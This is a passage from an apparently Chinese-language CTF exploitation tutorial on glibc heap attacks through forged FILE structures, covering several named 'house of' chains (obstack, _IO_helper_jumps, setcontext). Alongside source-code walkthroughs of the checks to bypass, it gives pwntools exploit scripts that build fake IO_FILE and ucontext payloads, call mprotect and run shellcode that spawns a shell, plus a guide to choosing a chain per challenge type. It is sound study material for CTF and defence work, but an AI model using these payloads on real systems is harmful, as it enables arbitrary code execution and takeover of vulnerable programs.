obstack_1grow (buf->obstack, buf->ch);
...
}
...
}
obstack_1grow 宏展开内容如下,可以看到该宏调用了 _obstack_newchunk 函数并将 buf->obstack 作为参数传入
声明位置: obstack.h  
定义:
# define obstack_1grow(OBSTACK, datum) \
__extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + 1 > __o->chunk_limit) \
_obstack_newchunk (__o, 1); \
obstack_1grow_fast (__o, datum); \
(void) 0; })
替换:
({
struct obstack *__o = (buf->obstack);
if (__o->next_free + 1 > __o->chunk_limit)_obstack_newchunk(__o, 1);
(*((__o)->next_free)++ = (buf->ch));
(void) 0;
})
_obstack_newchunk 函数会执行 CALL_CHUNKFUN 宏,这和前面的 House of 琴瑟琵琶利用链相同
void
_obstack_newchunk (struct obstack *h, int length)
{
...
struct _obstack_chunk *new_chunk;
...
new_chunk = CALL_CHUNKFUN (h, new_size);
...
}
综上所述: 1. 在__printf_buffer_as_file_overflow函数中: * file->next->mode!=__printf_buffer_mode_failed && file->next->write_ptr == file->next->write_end 2. 在__printf_buffer_as_file_commit函数中: * file->stream._IO_write_ptr >= file->next->write_ptr * file->stream._IO_write_ptr <= file->next->write_end * file->stream._IO_write_base == file->next->write_base * file->stream._IO_write_end == file->next->write_end 3. 在__printf_buffer_flush函数中: * file->next->mode =__printf_buffer_mode_obstack 4. 在__printf_buffer_flush_obstack函数中: * buf->base.write_ptr == &buf->ch + 1 <==> file->next.write_ptr == &(file->next) + 0x30 + 1 5. 在obstack_1grow宏定义中: * (struct __printf_buffer_obstack *) file->obstack->next_free + 1 > (struct __printf_buffer_obstack *) file->obstack->chunk_limit * (h)->use_extra_arg 不为 0 <==> (struct __printf_buffer_obstack *) file->obstack->use_extra_arg != 0 6. 最终调用(struct __printf_buffer_obstack *) file->obstack->chunkfun((struct __printf_buffer_obstack *) file->obstack->extra_arg) [[./houseofsnake1.png]]

house of 秦月汉关

因为puts函数在开始时候会调用strlen, 我们跟随puts函数找到真正的strlen。可以看出puts会调用strlen的PLT表,PLT表跳转到一个*ABS*@got.plt>的地方,里面存储的才是真正的strlen函数地址,改写这个来getshell ### house of 魑魅魍魉 一般来说一类跳表只有一个,但_IO_helper_jumps比较特殊,通过下面可以看出,跳表会根据COMPILE_WPRINTF值不同而生成不同的,但可能libc在编译时调用两次,所以我们可以在内存中看到两个_IO_helper_jumps,每种各一个。其中COMPILE_WPRINTF == 0先生成,COMPILE_WPRINTF == 1后生成

#ifdef COMPILE_WPRINTF
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_wdefault_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT (xsputn, _IO_wdefault_xsputn),
JUMP_INIT (xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_wdefault_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#else
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_default_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, _IO_default_pbackfail),
JUMP_INIT (xsputn, _IO_default_xsputn),
JUMP_INIT (xsgetn, _IO_default_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_default_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#endif

同样,面对不同的COMPILE_WPRINTF所对应的helper_file也有所不同,区别在于是否需要伪造struct _IO_wide_data _wide_data;

struct helper_file
{
struct _IO_FILE_plus _f;
#ifdef COMPILE_WPRINTF
struct _IO_wide_data _wide_data;
#endif
FILE *_put_stream;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
};

同样,_IO_helper_overflow这个函数在内存中也有 2 份。通过测试发现,如果使用COMPILE_WPRINTF == 0的情况,在攻击过程中s->_IO_write_base会变成largebin->fd_nextsize指针,从而被强制修改无法控制。为了方便,我们使用COMPILE_WPRINTF == 1所生成的_IO_helper_overflow。该函数在攻击过程中的作用是控制_IO_default_xsputn的三个参数

static int _IO_helper_overflow (FILE *s, int c)
{
FILE *target = ((struct helper_file*) s)->_put_stream;
#ifdef COMPILE_WPRINTF
int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base;
if (used)
{
// 利用这个链,显然这三个参数我们都可控。
size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used);
if (written == 0 || written == WEOF)
return WEOF;
__wmemmove (s->_wide_data->_IO_write_base,
s->_wide_data->_IO_write_base + written,
used - written);
s->_wide_data->_IO_write_ptr -= written;
}
#else
// 如果使用这条链,_IO_write_ptr 将处于 largebin 的 bk_size 指针处
int used = s->_IO_write_ptr - s->_IO_write_base;
if (used)
{
size_t written = _IO_sputn (target, s->_IO_write_base, used);
if (written == 0 || written == EOF)
return EOF;
memmove (s->_IO_write_base, s->_IO_write_base + written,
used - written);
s->_IO_write_ptr -= written;
}
#endif
return PUTC (c, s);
}

通过上面函数可以清楚看出,在执行size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used)

  • FILE *target = ((struct helper_file*) s)->_put_stream可控
  • s->_wide_data->_IO_write_base可控
  • int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base可控

就达成了3个参数可控的要求,然后通过修改((struct helper_file*) s)->_put_streamvtable指向_IO_str_jumps,使其调用_IO_default_xsputn函数

需要注意的是,s->_wide_data->_IO_write_ptrs->_wide_data->_IO_write_basewchar_t *类型,也就是说used实际是(s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base) >> 2,(在 Linux 系统上,宽字符通常使用UTF-32编码表示,而UTF-32使用32位表示一个字符,因此wchar_t类型在Linux上通常为4字节)

_IO_default_xsputn 函数内要绕过的内容较多。该函数在攻击过程中的作用是两次调用 __mempcpy ,第一次利用任意地址写修改 __mempcpy 对应的 got 表中的值,第二次调用 __mempcpy 劫持程序执行流

size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
// 要 more > count,能再次返回执行 __mempcpy
if (count > more)
count = more;
// 要 count > 20
if (count > 20)
{
// 利用此处实现 house of 借刀杀人,
// 修改 memcpy 的内容为setcontext
// 再次返回的时候就能够实现 house of 一骑当千
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
// 要 more > count,能再次返回执行 __mempcpy
more -= count;
}
// 绕过下面这一行,再次执行for循环的内容
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

需要绕过内容总结如下 * 需要more > count,能再次返回执行__mempcpy,且要想再次返回执行memcpy,由于此时f->_IO_write_ptr_IO_str_overflow函数修改为指向"/bin/sh"字符串,因此count = f->_IO_write_end - f->_IO_write_ptr可能为一个很大的值,导致count > more,进而更新countmore,因此再次循环时要求more > 20。由于上一次循环中依次执行了more -= countmore--语句,因此要求more ≥ count + 1 + 21 * 需要count > 20,因此count至少为21

第一次执行__mempcpy (f->_IO_write_ptr, s, count);

  • _IO_write_ptr__mempcpy表项
  • s为要写入的内容

再次执行__mempcpy (f->_IO_write_ptr, s, count)

  • 需要绕过if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF),具体绕过方式接下来会介绍
  • f->_IO_write_ptrrdi,srsicountrdx

同样,执行_IO_str_overflow需要绕过内容也比较多。该函数的作用是控制fp->_IO_write_ptr,从而控制_IO_default_xsputn第二次循环中__mempcpy的第一个参数

int _IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
// 需要进入来控制 fp->_IO_write_ptr , _flags==0x400
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr; // 控制 fp->_IO_write_ptr 指向 &"/bin/sh" - 1 作为下一次 memcpy(system) 的第一个参数。
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
// 不能进入,要让 _IO_blen (fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base) 足够大。
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
// 此处 fp->_IO_write_ptr 自加1,所以之前要少1.
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

需要绕过内容总结如下: * _flags = 0x400 * fp->_IO_read_ptr为再次执行__mempcpy (f->_IO_write_ptr, s, count);rdi - 1 * (fp)->_IO_buf_end - (fp)->_IO_buf_base要足够大,一般设置(fp)->_IO_buf_end = 0xFFFFFFFFFFFFFFF0即可

[[./houseofkmwl1.png]]

house of 一骑当千

house_of_一骑当千是一种只用setcontext就定能绕过沙盒攻击手法

ucontext函数族

int getcontext(ucontext_t *ucp);
int setcontext(const ucontext_t *ucp)
void makecontext(ucontext_t *ucp, void (*func)(), int argc, ...);
int swapcontext(ucontext_t *restrict oucp,const ucontext_t *restrict ucp);
  1. getcontext用来获取用户上下文
  2. setcontext用来设置用户上下文
  3. makecontext操作用户上下文,可以设置执行函数,本质调用setcontext
  4. swapcontext进行两个上下文的交换
setcontext

以我们关注的setcontext为例 ,它是由汇编所写,在 /sysdeps/unix/sysv/linux/x86_64/setcontext.S中。剥离复杂的宏之后发现,除了信号量系统调(__NR_rt_sigprocmask)用外,无非就是一些赋值操作。(代码虽然很长,但为了展现全貌我就不做删减了,大家关注中文注释的地方)

ENTRY(__setcontext)
/* Save argument since syscall will destroy it. */
pushq %rdi
cfi_adjust_cfa_offset(8)

/* Set the signal mask with
rt_sigprocmask (SIG_SETMASK, mask, NULL, _NSIG/8). */
leaq oSIGMASK(%rdi), %rsi
xorl %edx, %edx
movl $SIG_SETMASK, %edi
movl $_NSIG8,%r10d
movl $__NR_rt_sigprocmask, %eax
syscall
/* Pop the pointer into RDX. The choice is arbitrary, but
leaving RDI and RSI available for use later can avoid
shuffling values. */
popq %rdx # 这是就是 rdi 向 rdx转换的关键。
cfi_adjust_cfa_offset(-8)
cmpq $-4095, %rax /* Check %rax for error. */
jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */

/* Restore the floating-point context. Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
ldmxcsr oMXCSR(%rdx)


/* Load the new stack pointer, the preserved registers and
registers used for passing args. */
cfi_def_cfa(%rdx, 0)
cfi_offset(%rbx,oRBX)
cfi_offset(%rbp,oRBP)
cfi_offset(%r12,oR12)
cfi_offset(%r13,oR13)
cfi_offset(%r14,oR14)
cfi_offset(%r15,oR15)
cfi_offset(%rsp,oRSP)
cfi_offset(%rip,oRIP)
/* 这里往下就是 setcontext+61 的地方*/
movq oRSP(%rdx), %rsp
movq oRBX(%rdx), %rbx
movq oRBP(%rdx), %rbp
movq oR12(%rdx), %r12
movq oR13(%rdx), %r13
movq oR14(%rdx), %r14
movq oR15(%rdx), %r15

#if SHSTK_ENABLED
/* Check if shadow stack is enabled. */
testl $X86_FEATURE_1_SHSTK, %fs:FEATURE_1_OFFSET
jz L(no_shstk)

/* If the base of the target shadow stack is the same as the
base of the current shadow stack, we unwind the shadow
stack. Otherwise it is a stack switch and we look for a
restore token. */
movq oSSP(%rdx), %rsi
movq %rsi, %rdi

/* Get the base of the target shadow stack. */
movq (oSSP + 8)(%rdx), %rcx
cmpq %fs:SSP_BASE_OFFSET, %rcx
je L(unwind_shadow_stack)

L(find_restore_token_loop):
/* Look for a restore token. */
movq -8(%rsi), %rax
andq $-8, %rax
cmpq %rsi, %rax
je L(restore_shadow_stack)

/* Try the next slot. */
subq $8, %rsi
jmp L(find_restore_token_loop)

L(restore_shadow_stack):
/* Pop return address from the shadow stack since setcontext
will not return. */
movq $1, %rax
incsspq %rax

/* Use the restore stoken to restore the target shadow stack. */
rstorssp -8(%rsi)

/* Save the restore token on the old shadow stack. NB: This
restore token may be checked by setcontext or swapcontext
later. */
saveprevssp

/* Record the new shadow stack base that was switched to. */
movq (oSSP + 8)(%rdx), %rax
movq %rax, %fs:SSP_BASE_OFFSET

L(unwind_shadow_stack):
rdsspq %rcx
subq %rdi, %rcx
je L(skip_unwind_shadow_stack)
negq %rcx
shrq $3, %rcx
movl $255, %esi
L(loop):
cmpq %rsi, %rcx
cmovb %rcx, %rsi
incsspq %rsi
subq %rsi, %rcx
ja L(loop)

L(skip_unwind_shadow_stack):
movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Get the return address set with getcontext. */
movq oRIP(%rdx), %r10

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* Check if return address is valid for the case when setcontext
is invoked from __start_context with linked context. */
rdsspq %rax
cmpq (%rax), %r10
/* Clear RAX to indicate success. NB: Don't use xorl to keep
EFLAGS for jne. */
movl $0, %eax
jne L(jmp)
/* Return to the new context if return address valid. */
pushq %r10
ret

L(jmp):
/* Jump to the new context directly. */
jmp *%r10

L(no_shstk):
#endif
/* The following ret should return to the address set with
getcontext. Therefore push the address on the stack. */
movq oRIP(%rdx), %rcx
pushq %rcx

movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* End FDE here, we fall into another context. */
cfi_endproc
cfi_startproc

/* Clear rax to indicate success. */
xorl %eax, %eax
ret
PSEUDO_END(__setcontext)

weak_alias (__setcontext, setcontext)

ucontext结构体

ucontext函数族中可以看到存在ucontext类型的结构体,也就是传入setcontextrdi。这个结构体如下。

typedef struct ucontext_t
{
unsigned long int __ctx(uc_flags); // 1个字长
struct ucontext_t *uc_link;//1个字长
stack_t uc_stack; //3个字长
mcontext_t uc_mcontext; //操作部分1
sigset_t uc_sigmask; //操作部分2
struct _libc_fpstate __fpregs_mem; //操作部分3
__extension__ unsigned long long int __ssp[4];//操作部分4
} ucontext_t;

setcontext函数中,除了对mcontext_t uc_mcontext; sigset_t uc_sigmask; struct _libc_fpstate __fpregs_mem __ssp这4个进行操作外,并没有对其他部分操作,也就是我们可以不关心其他的值。

  1. uc_sigmask:这个主要是负责信号量,经测试全是0就可以,当然也可以使用其他程序拷贝过来的信号量。

  2. uc_mcontext:这个就是存储寄存器的结构体,也是我们平时setcontext+53所使用的地方。结构体如下

typedef struct
{
gregset_t __ctx(gregs);
/* Note that fpregs is a pointer. */
fpregset_t __ctx(fpregs);
__extension__ unsigned long long __reserved1 [8];
} mcontext_t;
typedef greg_t gregset_t[__NGREG];

#ifdef __USE_GNU
/* Number of each register in the `gregset_t' array. */
enum
{
REG_R8 = 0,
# define REG_R8 REG_R8
REG_R9,
# define REG_R9 REG_R9
REG_R10,
# define REG_R10 REG_R10
REG_R11,
# define REG_R11 REG_R11
REG_R12,
# define REG_R12 REG_R12
REG_R13,
# define REG_R13 REG_R13
REG_R14,
# define REG_R14 REG_R14
REG_R15,
# define REG_R15 REG_R15
REG_RDI,
# define REG_RDI REG_RDI
REG_RSI,
# define REG_RSI REG_RSI
REG_RBP,
# define REG_RBP REG_RBP
REG_RBX,
# define REG_RBX REG_RBX
REG_RDX,
# define REG_RDX REG_RDX
REG_RAX,
# define REG_RAX REG_RAX
REG_RCX,
# define REG_RCX REG_RCX
REG_RSP,
# define REG_RSP REG_RSP
REG_RIP,
# define REG_RIP REG_RIP
REG_EFL,
# define REG_EFL REG_EFL
REG_CSGSFS, /* Actually short cs, gs, fs, __pad0. */
# define REG_CSGSFS REG_CSGSFS
REG_ERR,
# define REG_ERR REG_ERR
REG_TRAPNO,
# define REG_TRAPNO REG_TRAPNO
REG_OLDMASK,
# define REG_OLDMASK REG_OLDMASK
REG_CR2
# define REG_CR2 REG_CR2
};
#endif
  1. __fpregs_mem:这个所对应的步骤为setcontext中的如下内容,作用使加载浮点环境,需要可写。偏移为0xe0
/* Restore the floating-point context.  Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
  1. __ssp:这个所对应的步骤为setcontext中的如下内容,作用使加载 MXCSR 寄存器,经测试0也行,偏移为0x1c0
ldmxcsr oMXCSR(%rdx)

exp

ucontext =b''
ucontext += p64(0)*5
mprotect_len = 0x20000
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0

# 当下面 padding 为空时,fake_io_addr 就是 ucontext 开始的地址
padding = fake_io_file
payload_start_addr = fake_io_addr
# 0x2e8 下面的 print("IO_FILE len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = payload_start_addr + 0x2e8 + 0x10
__rip = mprotect_addr
ucontext += p64(0)*8
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写
print("ucontext len is:",hex(len(ucontext))) # 0xe8

'''
ucontext = ucontext.ljust(0x128,b'\x00')

# 加载信号量 ,好像全是0也行 ,0x10个字长
ucontext += p64(0)*0x10
# ucontext += p64(0)+p64(0x0000002000000000)+p64(0)+p64(0)+p64(0x0000034000000340)+p64(0x0000000000000001)+p64(0x0000000103ae75f6)+p64(0)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0)

ucontext =ucontext.ljust(0x1c0,b'\x00')

# ucontext += p64(0x1f80) # LDMXCSR [rdx+0x1c0] 加载 MXCSR 寄存器,好像是0也行
'''

# payload 可以开始于 fake_io_file ,也可以直接从 ucontext 开始
payload = padding + ucontext

# 0x2e8 与 __rsp相呼应
print("IO_FILE len is",hex(len(payload)))
# 自己写 shellcode
shellcode = """

"""

# largbin_attak 时需要 + 0x10
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10)

payload += bytes(asm(shellcode))

完全体

house of 琴瑟琵琶

exp
 fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(setcontext_addr) # 需要执行的函数
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # 执行函数的 rdi
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # 触发 _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # 因为是largebin attack 所以: 0xd8=0xe8-0x10
# pause()

# 执行函数的 rdi 的地址所存储的内容
ucontext = b''
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # systm 栈帧务必要足够长
# 0x1c8 对应第256行的 print("payload len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = fake_io_addr + 0x1c0 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写

payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x1c0 与__rsp相呼应
# pause()
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # largbin_attak 时需要 +0x10
payload = payload + bytes(shellcode)

house of 魑魅魍魉

exp
# largebin_attack 攻击 house_魑魅魍魉
# 模拟只有一次写入,payload 必须在前面写入
# 为确保正确执行,需要利用 COMPILE_WPRINTF==1 的模式

fake_io_addr = heap_addr + 0x1390
put_stream_offset = 0x30 # put_stream 距离 fake_io 的偏移
put_stream_addr = fake_io_addr + put_stream_offset
write_target_addr = memcpy_addr
target_value_offset = 0x200 # 需要执行的函数存储的地址距离 fake_io 的偏移
target_value_addr = fake_io_addr + target_value_offset


IO_wide_data_addr = fake_io_addr + 0xe0 # len(IO_IFLE) 利用原有的宽字符
# 再一次执行到 memcpy时rdi的地址
rdi_offset = 0xf # 因为 _IO_write_ptr 会加1,此处确保内存对齐
rdi_ucontext_addr = target_value_addr + rdi_offset
# more_len > count_len > 0x20 可以再次执行 memcpy
more_len = 0x80*8 # 为什么 IO_help_jump_0_ 里面还要在右边移位2位??
count_len= 0x28 # 要大于0x20
_flags = 0x400 #_flags == 0x400 执行 fp->_IO_write_ptr = fp->_IO_read_ptr;


fake_io_file = b""
fake_io_file = fake_io_file.ljust(0x20,b'\x00')
fake_io_file += p64(_flags) # 此处是 put_stream 起始地址; _flags == 0x400 执行 fp->_IO_write_ptr = fp->_IO_read_ptr;
fake_io_file += p64(rdi_ucontext_addr)
fake_io_file += p64(0)*2
fake_io_file += p64(write_target_addr - 0x20)
fake_io_file += p64(write_target_addr)
fake_io_file += p64(write_target_addr + count_len)
fake_io_file += p64(0)
# 用于绕过 if (pos >= (size_t) (_IO_blen (fp) + flush_only)) 不执行malloc
fake_io_file += p64((1<<64)-1)
fake_io_file += p64(0)*2
fake_io_file += p64(heap_addr+0x2000) #可写
fake_io_file += p64(0)*2
fake_io_file += p64(IO_wide_data_addr)
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_help_jump_0_addr)
fake_io_file += p64(0)
fake_io_file += p64(heap_addr+0x2000) #可写
fake_io_file += p64(0)
fake_io_file += p64(target_value_addr)
fake_io_file += p64(target_value_addr + more_len)
fake_io_file += p64(IO_str_jumps_addr)
fake_io_file = fake_io_file.ljust(0x1b8,b'\x00')
fake_io_file += p64(put_stream_addr)
fake_io_file = fake_io_file.ljust(target_value_offset - 0x10,b"\x00") # largbin_attak 时需要 - 0x10

# 需要执行的函数是 setcontext,距离 fake_io 的偏移为 target_value_offset
fake_io_file += p64(setcontext_addr) + p64(0) # 此段长度为 0x10 与 rdi_offset 对应


ucontext =b""
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # systm 栈帧务必要足够长
# 0x2e8 下面的 print("payload len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = fake_io_addr + 0x2e8 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写


payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x2e8 与__rsp相呼应
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # largbin_attak 时需要 + 0x10
payload += bytes(shellcode)

总结

将堆的问题转化为几类: 1. 首先是内存修改的次数,有些题目可以多次(2次及以上)修改内存,有些只能一次 2. 修改内存的情况,有些可以任意写,既可以申请到此块内存;有些不能任意写入,只能写入堆值或者unsortbin地址,例如largebin attack 3. 泄露的情况,除了个别方法外,大都需要泄露内存,有些题目还能够再次泄露内存中的数据,例如泄露ptr_guard,我称为二次泄露。除了个别情况外,大部分题目要想实现“二次泄露”必须要能申请到所要泄露的位置,显然,如果不能对内存有任意写的能力,是不可能实现“二次泄露”的(设置flag的沙雕题目除外)

1.修改内存:地址不限、次数不限、数据不限;可二次泄露

这种题目最为简单,2.34之前打hook,2.34及之后打EOP或者wide_IO都可以,如果有IO函数,还可以攻击house of 秦月汉关,基本上都是以tcache为主。

2.修改内存:地址不限、次数不限、数据不限;不可二次泄露

这种题目基本和上面的情况一样,只是在不能二次泄露的情况下,我们可以直接强制改写。

3.修改内存:地址不限、一次、数据不限;可二次泄露

2.34之前打hook,2.34及之后打EOP或者wide_IO都可以。因为可以二次泄露,所以EOP也可以用。

4.修改内存:地址不限、一次、数据不限;不可二次泄露

2.34之前打hook,2.34及之后打vtableEOPwide_IO都可以。

说明:从这里开始是个转折,一般如果可以任意改写内存都是可以申请到这一块内存,在这种情况下,改写hook是非常直管且简单的,即使2.34之后没有了hook,也可以通过修改vtableEOP等手段来进行攻击。而如果无法任意改写内存则只能够通过IO来进行攻击。

5.修改内存:地址不限、次数不限、修改为堆;可二次泄露(不可能)

如果不能任意改写内存,说明无法申请到这个内存,二次泄露基本不太可能。

6.修改内存:地址不限、次数不限、修改为堆;不可二次泄露

能多次修改内存为堆值攻击选择很多,house_of_emma就是一种选择,当然宽字符的板子也没问题。

7.修改内存:地址不限、一次、修改为堆;可二次泄露(不可能)

同5.

8.修改内存:地址不限、一次、修改为堆;不可二次泄露

这种显然必须伪造IO,使用现有的apple、cat、魑魅魍魉、琴瑟琵琶等链进行攻击。